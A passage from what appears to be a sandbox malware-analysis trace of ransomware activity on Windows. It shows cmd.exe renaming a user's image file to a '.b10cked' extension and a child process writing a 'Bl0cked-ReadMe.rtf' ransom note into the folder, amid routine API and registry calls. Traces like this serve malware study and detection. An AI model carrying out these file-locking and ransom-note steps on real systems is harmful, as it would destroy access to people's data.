_String2="ENDLOCAL") returned 8 [0140.951] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0140.951] _wcsicmp (_String1="move", _String2="START") returned -6 [0140.951] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0140.951] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0140.951] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0140.953] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.953] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.953] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ef55c, nVolumeNameSize=0x104, 
lpVolumeSerialNumber=0x1ef554, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ef554*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0140.953] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0140.953] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0140.953] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0140.953] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0140.953] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0140.953] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0140.953] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0140.953] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0140.953] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0140.953] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0140.953] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned 
-13 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0140.954] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0140.954] _wcsicmp (_String1="4_IRBU~1.JPG", _String2=".") returned 6 [0140.955] _wcsicmp (_String1="4_IRBU~1.JPG", _String2="..") returned 6 [0140.955] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_IRBU~1.JPG" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\4_irbu~1.jpg")) returned 0x20 [0140.955] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x251f18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.955] SetErrorMode (uMode=0x0) returned 0x0 [0140.955] SetErrorMode (uMode=0x1) returned 0x0 [0140.955] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_IRBU~1.JPG", nBufferLength=0x104, lpBuffer=0x1eeee4, 
lpFilePart=0x1eeecc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_IRBU~1.JPG", lpFilePart=0x1eeecc*="4_IRBU~1.JPG") returned 0x39 [0140.955] SetErrorMode (uMode=0x0) returned 0x1 [0140.955] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t")) returned 0x12 [0140.955] _wcsicmp (_String1="4_IRBU~1.JPG", _String2=".") returned 6 [0140.955] _wcsicmp (_String1="4_IRBU~1.JPG", _String2="..") returned 6 [0140.955] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_IRBU~1.JPG" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\4_irbu~1.jpg")) returned 0x20 [0140.955] SetErrorMode (uMode=0x0) returned 0x0 [0140.955] SetErrorMode (uMode=0x1) returned 0x0 [0140.955] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_IRBU~1.JPG", nBufferLength=0x104, lpBuffer=0x1ef360, lpFilePart=0x1ef0f8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_IRBU~1.JPG", lpFilePart=0x1ef0f8*="4_IRBU~1.JPG") returned 0x39 [0140.955] SetErrorMode (uMode=0x0) returned 0x1 [0140.956] SetErrorMode (uMode=0x0) returned 0x0 [0140.956] SetErrorMode (uMode=0x1) returned 0x0 [0140.956] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_Irbu3SMZgt2KGk_cO7.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x1ef568, lpFilePart=0x1ef0f8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_Irbu3SMZgt2KGk_cO7.jpg.b10cked", lpFilePart=0x1ef0f8*="4_Irbu3SMZgt2KGk_cO7.jpg.b10cked") returned 0x4d [0140.956] SetErrorMode (uMode=0x0) returned 0x1 [0140.956] SetLastError (dwErrCode=0x0) [0140.956] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_Irbu3SMZgt2KGk_cO7.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\4_irbu3smzgt2kgk_co7.jpg.b10cked")) returned 0xffffffff [0140.956] 
GetLastError () returned 0x2 [0140.956] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_IRBU~1.JPG", fInfoLevelId=0x1, lpFindFileData=0x1eea74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eea74) returned 0x252128 [0140.956] FindNextFileW (in: hFindFile=0x252128, lpFindFileData=0x1eea74 | out: lpFindFileData=0x1eea74) returned 0 [0140.957] GetLastError () returned 0x12 [0140.957] FindClose (in: hFindFile=0x252128 | out: hFindFile=0x252128) returned 1 [0140.958] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_IRBU~1.JPG", fInfoLevelId=0x1, lpFindFileData=0x251cb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x251cb8) returned 0x252128 [0140.958] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_Irbu3SMZgt2KGk_cO7.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x1eed0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_Irbu3SMZgt2KGk_cO7.jpg.b10cked", lpFilePart=0x0) returned 0x4d [0140.958] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_Irbu3SMZgt2KGk_cO7.jpg", nBufferLength=0x104, lpBuffer=0x1eed0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_Irbu3SMZgt2KGk_cO7.jpg", lpFilePart=0x0) returned 0x45 [0140.958] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_Irbu3SMZgt2KGk_cO7.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\4_irbu3smzgt2kgk_co7.jpg")) returned 0x20 [0140.958] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_Irbu3SMZgt2KGk_cO7.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\4_irbu3smzgt2kgk_co7.jpg"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_Irbu3SMZgt2KGk_cO7.jpg.b10cked" (normalized: 
"c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\4_irbu3smzgt2kgk_co7.jpg.b10cked"), dwFlags=0x3) returned 1 [0140.958] FindClose (in: hFindFile=0x252128 | out: hFindFile=0x252128) returned 1 [0140.959] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1eecc0 | out: _Buffer=" 1") returned 9 [0140.959] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.959] GetFileType (hFile=0x7) returned 0x2 [0140.959] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0140.959] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1eec4c | out: lpMode=0x1eec4c) returned 1 [0140.959] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.959] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eec80 | out: lpConsoleScreenBufferInfo=0x1eec80) returned 1 [0140.959] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0140.960] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1eecc0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0140.960] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1eeca4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1eeca4*=0x1a) returned 1 [0140.960] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.960] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.960] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.960] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.960] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.960] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.961] SetConsoleInputExeNameW () returned 0x1 [0140.961] GetConsoleOutputCP () returned 0x1b5 [0140.961] 
GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.961] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.961] exit (_Code=0) Process: id = "177" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16e00" os_pid = "0xfb4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 15048 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 15049 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 15050 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 15051 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 15052 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 15053 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = 
mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 15054 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 15055 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 15056 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 15057 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16118 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16119 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16120 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16121 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 16122 start_va = 0x3c0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 16123 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 16124 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file 
name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16125 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16126 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16127 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16128 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16129 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16130 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16131 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16132 start_va = 0x3d0000 end_va = 0x497fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 16133 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: 
"c:\\windows\\system32\\imm32.dll") Region: id = 16134 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 16135 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 16136 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 16137 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 16138 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 16139 start_va = 0x4a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 16140 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 16141 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Thread: id = 234 os_tid = 0xfac [0141.818] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff04 | out: lpSystemTimeAsFileTime=0x18ff04*(dwLowDateTime=0x8e772a60, dwHighDateTime=0x1d440a9)) [0141.818] GetCurrentProcessId () returned 0xfb4 [0141.818] GetCurrentThreadId () returned 0xfac [0141.818] GetTickCount () returned 0x2c6e6 [0141.818] QueryPerformanceCounter (in: lpPerformanceCount=0x18fefc | out: lpPerformanceCount=0x18fefc*=19860731234) returned 1 [0141.825] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0141.825] __set_app_type (_Type=0x1) [0141.825] __p__fmode () returned 0x76b331f4 [0141.825] __p__commode () returned 0x76b331fc 
[0141.826] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0141.826] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0141.826] GetCurrentThreadId () returned 0xfac [0141.826] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xfac) returned 0x38 [0141.826] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.826] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0141.826] SetThreadUILanguage (LangId=0x0) returned 0x409 [0141.826] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0141.826] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fe94 | out: phkResult=0x18fe94*=0x0) returned 0x2 [0141.826] VirtualQuery (in: lpAddress=0x18fecb, lpBuffer=0x18fe64, dwLength=0x1c | out: lpBuffer=0x18fe64*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.826] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18fe64, dwLength=0x1c | out: lpBuffer=0x18fe64*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0141.826] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18fe64, dwLength=0x1c | out: lpBuffer=0x18fe64*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0141.826] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18fe64, dwLength=0x1c | out: lpBuffer=0x18fe64*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) 
returned 0x1c [0141.826] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18fe64, dwLength=0x1c | out: lpBuffer=0x18fe64*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0141.827] GetConsoleOutputCP () returned 0x1b5 [0141.827] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.827] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0141.827] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.827] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0141.827] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.827] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0141.827] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.827] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0141.827] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.827] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0141.828] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.828] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0141.828] GetEnvironmentStringsW () returned 0x2401a8* [0141.828] FreeEnvironmentStringsW (penv=0x2401a8) returned 1 [0141.828] GetEnvironmentStringsW () returned 0x2401a8* [0141.828] FreeEnvironmentStringsW (penv=0x2401a8) returned 1 [0141.828] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ee04 | out: phkResult=0x18ee04*=0x40) returned 0x0 [0141.828] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x0, lpData=0x18ee10*=0xd0, lpcbData=0x18ee08*=0x1000) returned 0x2 [0141.828] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, 
lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x4, lpData=0x18ee10*=0x1, lpcbData=0x18ee08*=0x4) returned 0x0 [0141.828] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x0, lpData=0x18ee10*=0x1, lpcbData=0x18ee08*=0x1000) returned 0x2 [0141.828] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x4, lpData=0x18ee10*=0x0, lpcbData=0x18ee08*=0x4) returned 0x0 [0141.828] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x4, lpData=0x18ee10*=0x40, lpcbData=0x18ee08*=0x4) returned 0x0 [0141.828] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x4, lpData=0x18ee10*=0x40, lpcbData=0x18ee08*=0x4) returned 0x0 [0141.828] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x0, lpData=0x18ee10*=0x40, lpcbData=0x18ee08*=0x1000) returned 0x2 [0141.828] RegCloseKey (hKey=0x40) returned 0x0 [0141.828] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ee04 | out: phkResult=0x18ee04*=0x40) returned 0x0 [0141.829] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x0, lpData=0x18ee10*=0x40, lpcbData=0x18ee08*=0x1000) returned 0x2 [0141.829] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x4, 
lpData=0x18ee10*=0x1, lpcbData=0x18ee08*=0x4) returned 0x0 [0141.829] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x0, lpData=0x18ee10*=0x1, lpcbData=0x18ee08*=0x1000) returned 0x2 [0141.829] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x4, lpData=0x18ee10*=0x0, lpcbData=0x18ee08*=0x4) returned 0x0 [0141.829] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x4, lpData=0x18ee10*=0x9, lpcbData=0x18ee08*=0x4) returned 0x0 [0141.829] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, 